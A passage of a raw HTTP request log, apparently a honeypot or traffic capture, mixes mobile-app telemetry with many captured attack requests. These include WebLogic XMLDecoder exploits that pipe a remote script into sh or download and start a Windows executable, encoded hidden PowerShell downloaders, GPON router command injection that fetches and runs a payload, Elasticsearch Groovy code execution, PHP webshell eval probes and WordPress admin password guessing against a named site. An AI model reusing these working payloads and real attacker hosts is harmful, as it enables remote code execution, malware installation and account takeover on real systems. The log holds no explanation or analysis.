</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
À6ªÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î_4Y›∆√«∆fl

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

QKxck4nKNjPGGVER9t66ba7wMHTBvjchFvs+C8q8tKmt9EbDGzJIjGHzRL6oEDPbij+HvXm3uQcv9peUFVy5U+8JBHh478p++BbZ8jXCfNWVX1nsmlyO9olBnv9p4y968a4lN421rGBeI6OPVHKSLS0jAIFWCpF96SP1QLniQMhqOQQOBmIL4rEInp/9C16WBlfWmgxR7P/T2R6V1wCjc5nveJse5dXajQwup6W5e3BpVOzn0wTutNdSA0EBs80PAd68Des8TqGR0sZT22rlQm8vPdOl6B3DJYoU+df0YbNUYa/fgybETKNLisg0JnfTGf4JkC7LumDb0ar97laF2bOIAAxbpvothU1Zi4XfyrelcxCQNsKGwhFRFs7rjK32yz2a

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

301660
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

5f0effa44094e54dcb125f56bea05a5c
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1051
Content-Type: multipart/form-data; boundary=0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

985274
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

687b3b20b8cc9188e750dadcc9bef07c
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149303573355&a=PSCMN&i=2335908067&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache

log=admin&pwd=jamesatchue333

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache

log=admin&pwd=jamesatchue1234567

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=admin77

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

EaIPk9mdN6w65NSgPqe7G7tI4Js6A/KJ8BPQr/aYb605ZUxngus+ubRMActfqprqW6I+LcKXNJNQ8/0VAPUkdI2TtqTdrCnyJYxCgiwdjrnluvb3p7qX1MnEgDLWFA5ZO0jmDvjO23huLU2NegAWySjxxRnK+scD2k2Fe9TWLuLKatMwL48bqLZP0O0NV9ksFuTAppyWofizZ3blW5D5kVTKClfrhFS9wG7ZfVP9fq7BGitCA0JMdqQp1KQ76Z+apZxCCcUI34ib6N44qjxZ44V+uSDmBG85Q0S5v6Rt4d61+LHwghXA+Vht30TH3KnHGF7niIu1pwJuKm80faEhoEzXfIJwLuRIZN1Id5f3c7HJ76DkwvDTCF5J/A3J3KhOgz0ceHMkzDzhRbQr/2mPQ3UqsTU=

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://boys-here.com/nntesto/http.php HTTP/1.0
Accept: */*
Referer: http://boys-here.com/nntesto/http.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: boys-here.com
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache

xrumer=inside

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

h=die('Hello, Peppa!');

POST /wls-wsat/CoordinatorPortType11 HTTP/1.0
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Type: text/xml
Content-Length: 825

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
		<java version="1.8.0_131" class="java.beans.XMLDecoder">
		  <void class="java.lang.ProcessBuilder">
			<array class="java.la

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ü‰
ÎÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î™95Y›∆√«∆fl

POST http://md5online.net/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Host: md5online.net
Referer: http://md5online.net/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Proxy-Connection: Keep-Alive
Content-Length: 66

pass=53cb64666ccbe8fa36261fe8507ad4ba&option=hash2text&send=Submit

POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=CPOJ867TH

POST /rulai.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://x.x.x.x/rulai.php
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Content-Length: 377
Host: x.x.x.x

rulai=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

POST http://hydra.alibaba.com/utdid_uc_browser/get_aid/?auth[token]=c8bc6fdf9837b2cbc7a9ed011ca1327b&type=utdid&id=V3JxZrJFQuwDAMtgV%2FWSY7o6&aid= HTTP/1.1
Content-Length: 0
Host: hydra.alibaba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 18
Cache-Control: no-cache

log=admin&pwd=5555

POST http://check.proxyradar.com/azenv.php?auth=152363140601&a=PSCMN&i=1082781672&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Wï◊lÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=admin111

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84

{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache

S6dex47PZ2KT2iiFgR8sMuB3GYObbM7sRUc5dSr4/j4yZKFsc6FzNj4MJElJTfwkH5/lwLwDLiBGZYaHN5CDdG7aPlTkhjwfdtUv0OmpEnf9MGCS81XDA388GHcdLqqUG4LauXDwh/zdH3ZVSc9WbB8HmwZwFSFaUQKMXc7ls4djknDWFKtpnwqKmCV78M9LhsqzoFaHELydALUBZFhWX92KaVMFJunn7HQY4aVZj5U8Or79hZqV59oGilQ57qaPloB6oWhNVgbUeOvm1TTXfIlWIC8jUjfF4JqWeErKzoQuVFnz1ryrFgndQ8xLZ8HoROP0KfQ2T0XSqH4JDogrYCKexNva+8XR3sdN3+944zay5YcruL7wxCPdAoieog==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 640
Cache-Control: no-cache

FPYPyY/AbfEbxYRKmW/4d9zGGgj29ypeP8FJVu1dxpE7r8BHPVQIQHa+uOqQcfndl8iqCbZZ0obNt6gz9cMDk+RyyyS5SvLbqKd5pC0B8DJ3hMbCv+ZaQVNaVKQN4Z7CeeUbgLenJ4ZL18A/SW2WMc+3rX1eUmY/zJUw9Rf3VEtEkb2gaYBZ/lyd0+M+eOYCLrRPWoWbsKdbv76bIeDaRAKI+1K8k1P7hQJNkQDuewPnGTwPlNFnvms9PR3O+VwZEJ5XYEs9t8hNfhYqtg3QDYIW9SNwaJ+8zMWDk2dSZFlBZi5y+ERH3ztBSASkfYE1BozC46ABLP+pMSaxE+pOnI3djauRdsvWyh3XBTCmLXCkAZSzQICAlwJlboYTWdHQsVomVr4vO6xfbGXOUO581PYh8G146yuzfe/7IQaupRHL777MW4qleSQa1ym2rryB9J7LldQG5fOTiVGPCxfetkOtCz016vEyjNVY/kO2ESoO/QXDAAsETiR5Nau9p66aW83Fp02sg8j8Yjs23XlOtZ9yK4cBKTV+DuX66VaEnCOeOULXJXArOBxOX73q3TH4sK8rdcecKryT11jVTGCjk7oY0igpiqqS73I3EJ3HGnzpz6SkHMC9L/C3AYfdtNk=

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache

log=jamesatchue&pwd=a1234567

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 19
Cache-Control: no-cache

log=admin&pwd=00000

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

